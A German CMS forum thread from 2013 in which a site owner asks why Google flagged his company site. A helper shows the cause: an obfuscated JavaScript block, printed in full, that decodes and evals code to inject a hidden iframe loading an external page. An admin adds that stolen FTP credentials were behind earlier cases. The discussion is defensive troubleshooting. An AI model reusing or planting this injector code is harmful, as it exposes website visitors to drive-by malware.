Sie sind nicht angemeldet.

1

Dienstag, 6. August 2013, 20:22

Google - Diese Website kann Ihren Computer beschädigen.

Ich hab gestern das Update auf 3.9.9.5 gemacht, was auch problemlos funktioniert hat. Als ich heute meine Seite gegoogelt habe, hat Google die Seite gesperrt mit dem Vermerk: Diese Website kann Ihren Computer beschädigen. Ich habe keine neuen Seiten erzeugt, auch keinen neuen Quellcode mehr erzeugt. Meine Frage, kann das am Update liegen? Betrifft die Seite www.bavariaenergy.de - gegoogelt kann die Seite über - bürger speichern Energie - werden. Da es sich um eine Firmenwebseite handelt eilt meine Anfrage sehr. Ich hab zunächst mal bei Google einen Antrag auf erneute Überprüfung gestellt.

Werbung

cms2day

Profi

  • »cms2day« ist männlich

Beiträge: 1 282

CMS Version: 4.x/5.x

Beruf: Webentwickler

Paypal:

  • Nachricht senden

2

Dienstag, 6. August 2013, 23:19

Ui Ui Ui...

Also vorab, das liegt nicht am Update.
Wir haben an Sicherheitsmerkmalen rein gar nichts geändert.

Schau aber mal bitte in den Quelltext von Deiner Startseite.
Dort drin ist ganz unten folgender Code enthalten:

Quellcode

1
2
<script>aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}
if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)}</script>


Dahin gehört das nicht, fragt sich jetzt nur wo und wie Du Dir das eingefangen hast.
Das ist jedenfalls der Grund, wieso du von Google gesperrt wurdest.

Hab dazu folgendes gefunden:
http://quttera.blogspot.de/2013/08/504-w…us-iframes.html

Hab deine Seite ebenfalls geprüft, hier das Ergebnis:
http://quttera.com/detailed_report/www.bavariaenergy.de

Sieht also echt so aus, als hättest Du Spyware auf deinem Server.
Vermutlich in der index.html Deines Templates, prüfe dies doch bitte mal.
Lade Dir die index.html vom mal runter und schau, was dort ganz unten drin steht.

:pinch:

Werbung

3

Mittwoch, 7. August 2013, 15:48

Schadhaften Code gefunden und entfernt

Hab den schadhaften Code gefunden und entfernt, war am Ende der index.php - ich werde künftig keine externen Codes mehr einbinden, wenn ich auch nicht genau weis ob dies schuld daran war.

Werbung

cms2day

Profi

  • »cms2day« ist männlich

Beiträge: 1 282

CMS Version: 4.x/5.x

Beruf: Webentwickler

Paypal:

  • Nachricht senden

4

Mittwoch, 7. August 2013, 17:19

Das kann man schlecht nachvollziehen im Nachhinein.
Wie schon am Telefon gesagt, behalte es mal im Auge.

:thumbup:

Werbung

emet

Admin & Support

  • »emet« ist männlich

Beiträge: 2 530

Wohnort: Rhein/Main

Paypal:

  • Nachricht senden

5

Samstag, 10. August 2013, 18:36

Hier muss ich nochmal einschieben, dass mir in den letzten ca 2 Jahren 2-3 Fälle bekannt wurden, wo ebenfalls Code in die index.php oder die html des Templates geschleusst wurde.

In diesen Fällen war aber wohl jeweils der PC von einem Trojaner befallen der aus Software oder den laufenden Anwendungen Zugangsdaten ausliest bzw speichert.

Dadurch sind diese dann über den FTP Account an die index.php oder html des Templates gelangt und haben dort eine Verlinkung zu einer Seite mit Schadcode reinkopiert.

Bei solchen Dingen, wenn man genau weis, dass man selbst diesen Code nicht dort reingesetzt hat - daaannnn aber schleunigst den PC mit speziellen Tools checken.
.
HTML, was ist das? Ein neues Männermagazin? Css.., was es so alles gibt!

News: http://www.cms2day.de/news/1/
Features: http://www.cms2day.de/cms-funktionen/

Zufrieden mit cms2day und unserer Arbeit/Support - Spenden (-Button links) sind herzlich Willkommen - Dankeschön.
.

Werbung

Ähnliche Themen

Verwendete Tags

,